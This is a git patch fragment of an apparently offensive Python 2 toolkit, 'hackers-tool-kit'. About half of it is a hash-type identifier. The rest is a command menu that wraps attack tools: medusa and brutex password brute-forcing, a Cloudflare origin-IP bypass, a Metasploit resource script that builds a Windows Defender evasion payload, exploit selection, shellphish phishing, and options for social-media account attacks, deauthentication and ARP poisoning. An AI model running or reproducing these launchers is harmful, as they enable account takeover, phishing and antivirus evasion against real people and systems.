hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') - os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') - os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) - os.system('echo "run\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> handler.rc'.format(f)) - os.system('echo "show options\n" >> handler.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> handler.rc') - os.system('echo "services\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - found = True -mainbanner() -main() From 55bcfd40b27e446c8dde3d455611b65ad52218f0 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Thu, 21 Feb 2019 23:03:42 +0100 Subject: [PATCH 018/214] Add 